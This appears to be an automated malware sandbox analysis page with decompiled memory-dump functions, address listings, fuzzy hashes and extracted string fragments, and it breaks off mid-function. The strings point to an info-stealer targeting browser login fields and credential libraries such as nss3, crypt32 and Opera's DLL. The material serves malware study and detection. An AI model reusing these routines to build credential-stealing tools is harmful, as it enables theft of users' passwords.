										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x1e4958bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x1e4958bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x1e4958b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x1e495898 = 7;
										return _t75;
									} else {
										 *0x1e495898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x1e495898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                  0x1e461002
                                  0x1e46100c
                                  0x1e46100f
                                  0x1e461012
                                  0x1e461018
                                  0x00000000
                                  0x1e46102e
                                  0x1e461030
                                  0x00000000
                                  0x1e461032
                                  0x1e461032
                                  0x1e461038
                                  0x1e461038
                                  0x1e46121e
                                  0x1e4611ff
                                  0x1e461205
                                  0x1e461207
                                  0x1e46120c
                                  0x1e46120e
                                  0x1e461210
                                  0x1e461212
                                  0x1e461212
                                  0x1e461210
                                  0x1e46121c
                                  0x1e46121c
                                  0x1e461228
                                  0x1e461228
                                  0x1e46101c
                                  0x1e46101c
                                  0x1e46101c
                                  0x1e46101f
                                  0x1e461022
                                  0x1e461025
                                  0x1e46102c
                                  0x1e46102c
                                  0x00000000
                                  0x1e46102c
                                  0x1e461027
                                  0x1e46102a
                                  0x1e46103f
                                  0x1e46103f
                                  0x1e461042
                                  0x1e461044
                                  0x1e461047
                                  0x1e461049
                                  0x1e46104c
                                  0x1e46104e
                                  0x1e461088
                                  0x1e461088
                                  0x1e46108a
                                  0x1e46108d
                                  0x1e46108f
                                  0x1e461091
                                  0x1e461091
                                  0x1e461093
                                  0x1e461095
                                  0x1e461097
                                  0x1e4610c8
                                  0x1e4610cb
                                  0x1e4610ce
                                  0x1e4610d0
                                  0x1e4610f4
                                  0x1e4610f4
                                  0x1e4610fa
                                  0x1e461100
                                  0x1e461102
                                  0x1e461150
                                  0x1e461150
                                  0x1e461154
                                  0x1e461167
                                  0x1e46116a
                                  0x1e46116a
                                  0x1e461156
                                  0x1e461156
                                  0x1e461158
                                  0x1e46115b
                                  0x1e46115d
                                  0x1e46115f
                                  0x1e46115f
                                  0x1e46115f
                                  0x1e461162
                                  0x1e461162
                                  0x1e46116c
                                  0x1e46116f
                                  0x1e461171
                                  0x1e46117b
                                  0x1e46117b
                                  0x1e46117d
                                  0x1e461183
                                  0x1e461183
                                  0x1e461186
                                  0x1e461188
                                  0x1e461199
                                  0x1e46118a
                                  0x1e46118a
                                  0x1e46118c
                                  0x1e46118f
                                  0x1e461191
                                  0x1e461191
                                  0x1e461191
                                  0x1e461194
                                  0x1e461194
                                  0x1e46119c
                                  0x1e4611a2
                                  0x1e4611a8
                                  0x1e4611ac
                                  0x1e4611af
                                  0x1e4611c7
                                  0x1e4611b1
                                  0x1e4611b1
                                  0x1e4611b4
                                  0x1e4611b7
                                  0x1e4611b9
                                  0x1e4611b9
                                  0x1e4611b9
                                  0x1e4611bc
                                  0x1e4611c2
                                  0x1e4611c2
                                  0x1e4611cb
                                  0x1e4611ce
                                  0x1e4611d4
                                  0x1e4611e7
                                  0x1e4611ed
                                  0x1e4611ef
                                  0x00000000
                                  0x00000000
                                  0x1e4611f1
                                  0x00000000
                                  0x1e4611d6
                                  0x1e4611d6
                                  0x00000000
                                  0x1e4611d6
                                  0x1e4611d4
                                  0x1e461104
                                  0x1e461106
                                  0x00000000
                                  0x00000000
                                  0x1e461108
                                  0x1e46110c
                                  0x1e46111d
                                  0x1e46110e
                                  0x1e46110e
                                  0x1e461110
                                  0x1e461113
                                  0x1e461115
                                  0x1e461115
                                  0x1e461115
                                  0x1e461118
                                  0x1e461118
                                  0x1e461126
                                  0x1e46113a
                                  0x1e46113d
                                  0x1e46113f
                                  0x00000000
                                  0x1e461141
                                  0x1e461141
                                  0x00000000
                                  0x1e461141
                                  0x1e46113f
                                  0x1e4610d6
                                  0x1e4610d9
                                  0x1e4610dd
                                  0x1e4610e3
                                  0x1e4610e6
                                  0x1e4610e9
                                  0x00000000
                                  0x00000000
                                  0x1e4610ee
                                  0x1e4610f0
                                  0x1e4610f2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e4610f2
                                  0x00000000
                                  0x1e461099
                                  0x1e461099
                                  0x1e46109c
                                  0x1e46109c
                                  0x1e46109e
                                  0x1e4610a0
                                  0x1e4610b3
                                  0x1e4610a2
                                  0x1e4610a2
                                  0x1e4610a4
                                  0x1e4610a7
                                  0x1e4610a9
                                  0x1e4610ab
                                  0x1e4610ab
                                  0x1e4610ab
                                  0x1e4610ae
                                  0x1e4610ae
                                  0x1e4610b6
                                  0x1e4610b9
                                  0x00000000
                                  0x00000000
                                  0x1e4610be
                                  0x1e4610c1
                                  0x1e4610c3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e4610c3
                                  0x1e4610c5
                                  0x00000000
                                  0x1e4610c5
                                  0x1e461097
                                  0x1e461050
                                  0x1e461053
                                  0x1e461056
                                  0x1e461059
                                  0x1e46105c
                                  0x1e46105e
                                  0x1e461060
                                  0x1e461062
                                  0x1e461064
                                  0x1e461064
                                  0x1e461062
                                  0x1e461066
                                  0x1e461069
                                  0x1e46106b
                                  0x1e46106d
                                  0x1e46106f
                                  0x1e461076
                                  0x1e461076
                                  0x1e461076
                                  0x00000000
                                  0x1e461076
                                  0x1e461071
                                  0x1e461074
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e461074
                                  0x1e461079
                                  0x1e461079
                                  0x1e46107b
                                  0x1e46107b
                                  0x1e46107f
                                  0x1e461082
                                  0x1e461085
                                  0x00000000
                                  0x1e461085
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
                                  • Instruction ID: ea071a5036fc68939154c9578114b325cb73a282f3fa86f96ecccd2a53f15d61
                                  • Opcode Fuzzy Hash: d46e3f13d84df42ceb08b36fabe2cc6a014385cb28faf3b70c402f637ba721c2
                                  • Instruction Fuzzy Hash: A8716A74A00662CBCF18CF66D49067AB3F2FB4C301B614A6FD98A97740D779E951CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085B1F, Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63e38cc04860cc156fbed1a4264af5f5c2f37f156aa9d970c5aac7fbf5d68150
                                  • Instruction ID: ad6c7958db771e5fd63ea7c9b6555ad0e724312f9ec9f6d80baa98197cb631bb
                                  • Opcode Fuzzy Hash: 63e38cc04860cc156fbed1a4264af5f5c2f37f156aa9d970c5aac7fbf5d68150
                                  • Instruction Fuzzy Hash: 12417474228A4C8F8F98EF3C809927AB7D3FB99301781476E94DBCB609DF3484418B41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085B22, Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e026317e55c6306f062c495fde8b476288e1856e365cbfe34eac9301cd3fd02
                                  • Instruction ID: 038da6b3c8cf0f3a59592cb0dccf798c4de1c41ccc07c2ebad054bf515f20ba5
                                  • Opcode Fuzzy Hash: 5e026317e55c6306f062c495fde8b476288e1856e365cbfe34eac9301cd3fd02
                                  • Instruction Fuzzy Hash: 19418474228A4C8F8F98EF2C809927AB7E3FB99305781476E54DBCB609DF30C4414B41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3B841F, Relevance: .1, Instructions: 64COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E1E3B841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E1E3E9810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                  0x1e3b842f
                                  0x1e3b8448
                                  0x1e3b844e
                                  0x1e3b8459
                                  0x1e3b845b
                                  0x1e3b8464
                                  0x1e409ac3
                                  0x1e409ac3
                                  0x1e409ac5
                                  0x1e409acb
                                  0x00000000
                                  0x00000000
                                  0x1e409acd
                                  0x1e409acd
                                  0x1e409ad1
                                  0x1e409ae9
                                  0x1e3b846a
                                  0x1e3b8475
                                  0x1e3b8479
                                  0x1e3b847c
                                  0x1e3b8481
                                  0x1e3b8482
                                  0x1e3b849a

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                  • Instruction ID: 5a997e8936a07a3d5e6ed4091dd66b87fb4ad1fcba47ec51653e3f89f3374aeb
                                  • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                  • Instruction Fuzzy Hash: 2C21A276E00119CBCB14CFA9C58068AF3F9FB8C350F664565E909B7740C630AE04CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085782, Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 2cc78a09d19c5f398008ea1688b95cc8c1ddcb03024eefdda9b8bb31da4d6ad0
                                  • Instruction ID: 73e64fc32340113dacefdb35a901d7e757bfa75ab477fdfff88fe98d6615e3f1
                                  • Opcode Fuzzy Hash: 2cc78a09d19c5f398008ea1688b95cc8c1ddcb03024eefdda9b8bb31da4d6ad0
                                  • Instruction Fuzzy Hash: 93B17C30518B488EDB59EF68C486AEEB7F1FF98300F50451EE49AC7252EF709509CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083612, Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: 8dab225b675e87295ecb355eb4acc288fd441c33828d87c5f9f3d896b10e54c1
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: 7A41B5B0A18B088BDB54EF88A4466BDBBE6FB88B00F00015ED449D3241DB759D458BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008A2B2, Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: db62fff25af3925e54917691914b2a67e7062e3ca37b09e7646a6b912e4320e8
                                  • Instruction ID: 58a75ddbbf06e799913a4e225ad28db6bf3e7b29a2989fb133575a17c115e766
                                  • Opcode Fuzzy Hash: db62fff25af3925e54917691914b2a67e7062e3ca37b09e7646a6b912e4320e8
                                  • Instruction Fuzzy Hash: 4EC15970618A099FC758FF24C895AEAF3E1FB94304F40472EA49AC7252DF30E655CB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008A712, Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: cb05d673c47a7ae2d66d815ca6a228a047ad20eafb62a31d774487998a22b97f
                                  • Instruction ID: 8af2fe3e132801dcac638476a72f08ff7383c4ca036f9b1018cfffb237210925
                                  • Opcode Fuzzy Hash: cb05d673c47a7ae2d66d815ca6a228a047ad20eafb62a31d774487998a22b97f
                                  • Instruction Fuzzy Hash: C151B53161C7488FE719EF14C8856EAB7E5FB85700F50192EE8CBC7242DBB49946CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008A703, Relevance: 15.2, Strings: 12, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: 6fb96763e362278f29aaf6212eb91c83152d30290888df31e90a76596c9fb0f8
                                  • Instruction ID: 6a0b7589b78360ebc70d3e7fb679b44841d54648f40d51e5e1547ddc700f771a
                                  • Opcode Fuzzy Hash: 6fb96763e362278f29aaf6212eb91c83152d30290888df31e90a76596c9fb0f8
                                  • Instruction Fuzzy Hash: 3C51B63161C7488FE719EF14C8856EAB7E5FB85700F50192EE8CBC7242DBB499468B83
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000842DC, Relevance: 10.4, Strings: 8, Instructions: 383COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: dc6d20832b1b39d4d3e1ef0e1bf0088f385c27fc1c01fde7cbb08d55fa20b8a2
                                  • Instruction ID: b12fbe1061bc1a2d8b723a96f120a41628e9a60adc973c45e98dcffa2501f3d2
                                  • Opcode Fuzzy Hash: dc6d20832b1b39d4d3e1ef0e1bf0088f385c27fc1c01fde7cbb08d55fa20b8a2
                                  • Instruction Fuzzy Hash: 6FC17070618A098FC798FB68D496AEAF3E1FF54300F914329948AC7256DF70EA45CBC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000842E2, Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: fcf9018c1be6966184a4ee4e363ac4f08b731027653b549db9160eebbf57608b
                                  • Instruction ID: f43b730276f561f5e70865d6a0107353887525da9ebf220bffecd509c77fc8be
                                  • Opcode Fuzzy Hash: fcf9018c1be6966184a4ee4e363ac4f08b731027653b549db9160eebbf57608b
                                  • Instruction Fuzzy Hash: 3DC16F70618A098FC798FF68D496AEAB3E1FB54300F914329948AC7256DF70EA45CBC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085CC6, Relevance: 9.0, Strings: 7, Instructions: 293COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: 6b92eb1aa766a92bc6c66d31c3b913f7d50a907dbfcbb04efdfad936ef228005
                                  • Instruction ID: 7e38cbcd966b1d5f5feeed6c80f691798be2b1c807dc3e35cd813ca71a063e58
                                  • Opcode Fuzzy Hash: 6b92eb1aa766a92bc6c66d31c3b913f7d50a907dbfcbb04efdfad936ef228005
                                  • Instruction Fuzzy Hash: 00A17070618B488FDB19EFA8D445BEEB7F1FB98300F40462EE48AD7252EF7095458789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085CD2, Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  • Opcode ID: b573ed857b762350397aae34e2f9aaad1298334114e586c20c9a60d900277d65
                                  • Instruction ID: 5b94a66324d8b990ce3396b305f4b2263c119c0a5036c48d3e8dfa57f7735a4a
                                  • Opcode Fuzzy Hash: b573ed857b762350397aae34e2f9aaad1298334114e586c20c9a60d900277d65
                                  • Instruction Fuzzy Hash: 19917F70618B488BDB29EF68D445BEEB7F1FF98300F40462EE48AD7252EF7095458789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00086032, Relevance: 7.7, Strings: 6, Instructions: 203COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: +Q0$$.dll$cryp$dll$nss3$t32.
                                  • API String ID: 0-4170858970
                                  • Opcode ID: e13da1e1da10821326afd1be170254d05dcc205c28daeeb2be5b43f80e027b11
                                  • Instruction ID: 2aa8d025a6a0a59aea0443e0e1dfb7e753d48d74f15425cd7e7de060358fe1ec
                                  • Opcode Fuzzy Hash: e13da1e1da10821326afd1be170254d05dcc205c28daeeb2be5b43f80e027b11
                                  • Instruction Fuzzy Hash: D3616D30624F099FDB59EF68C0497DAB3E2FF18300F40462EA48AD7255EB75A954CBC5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085342, Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  • Opcode ID: 3bce8432bb53f69dff89f782d383d0ac43fea380d39fc037f4eec24d0fb34a96
                                  • Instruction ID: d3113fc847bb01ce51d9c51c5343bdb91f17216c29089d9f30ef29897a2a9a74
                                  • Opcode Fuzzy Hash: 3bce8432bb53f69dff89f782d383d0ac43fea380d39fc037f4eec24d0fb34a96
                                  • Instruction Fuzzy Hash: EF718531618B498FD758EF68C4896EAB7F1FF54305F00062EE48AC7262EF71E9458B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00080C1B, Relevance: 6.5, Strings: 5, Instructions: 203COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: 9d61d245234966bc0c1a3fe91fc62a54b654ecd7c9218b0b933f7742d7c1c682
                                  • Instruction ID: 0956ef030c3c7b9253dd8854a53f19fa5e71a93eed5788acc0640ee0fdf5aa5a
                                  • Opcode Fuzzy Hash: 9d61d245234966bc0c1a3fe91fc62a54b654ecd7c9218b0b933f7742d7c1c682
                                  • Instruction Fuzzy Hash: A7715DB0918B4C8FDB94EF64C045AEEB7E1FF58300F40462EE49AD7205EF30A5458B89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00080C22, Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  • Opcode ID: 830692af89c2490d7b4368e454bf1d0c02c7517312ce2975cee6e76b39767e0b
                                  • Instruction ID: 39516a29f179efad873806b480e264e1de44b7ba4819679a6a8d4a24447cc083
                                  • Opcode Fuzzy Hash: 830692af89c2490d7b4368e454bf1d0c02c7517312ce2975cee6e76b39767e0b
                                  • Instruction Fuzzy Hash: 8D515DB0918B4C8FDB54EFA4C045AEEB7F1FF58300F40462EA49AE7215EF3095458B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081860, Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  • Opcode ID: 5e47e1e15cee6cbc846e9419a9f6f1f28e676b448bd6b16d5c66a9d5d73fed2f
                                  • Instruction ID: 98e4dbf7a4f90ba0372344fe8cd17168875c3762761e5b772386de3d4d64c6c3
                                  • Opcode Fuzzy Hash: 5e47e1e15cee6cbc846e9419a9f6f1f28e676b448bd6b16d5c66a9d5d73fed2f
                                  • Instruction Fuzzy Hash: C6414030619B888BCBB9EF64D8457EA77E5FF98301F40462E988EC7241DF30D5458782
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000834A2, Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: 6419c24cbf138628b6a8febf79bff5f1e4a7bf40373ab0f5f0bb5e9242ee0d47
                                  • Instruction ID: 625be75b6ea2aee39d901106f38089a799b3686ad34e490ca2b3fc85582b2d20
                                  • Opcode Fuzzy Hash: 6419c24cbf138628b6a8febf79bff5f1e4a7bf40373ab0f5f0bb5e9242ee0d47
                                  • Instruction Fuzzy Hash: CF418F70A18E0D8FCB94FF68C0957ED77E1FB98700F44456AE88DD7201DA35DA408B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083498, Relevance: 6.3, Strings: 5, Instructions: 55COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  • Opcode ID: a8cf342f6b6a7f3ac171f7c2a3a26b59383ac57db5d10b76e195e5f82cfb2098
                                  • Instruction ID: 7e565cc8996457f240076ddc51e03b99f5a3d298341160e3e5df2599df103159
                                  • Opcode Fuzzy Hash: a8cf342f6b6a7f3ac171f7c2a3a26b59383ac57db5d10b76e195e5f82cfb2098
                                  • Instruction Fuzzy Hash: 8D112E71818A0CDFDB54EF58C4863AD77F1FF68305F00406FE848E7221DA7182548B89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3D645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 26%
                                  			E1E3D645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
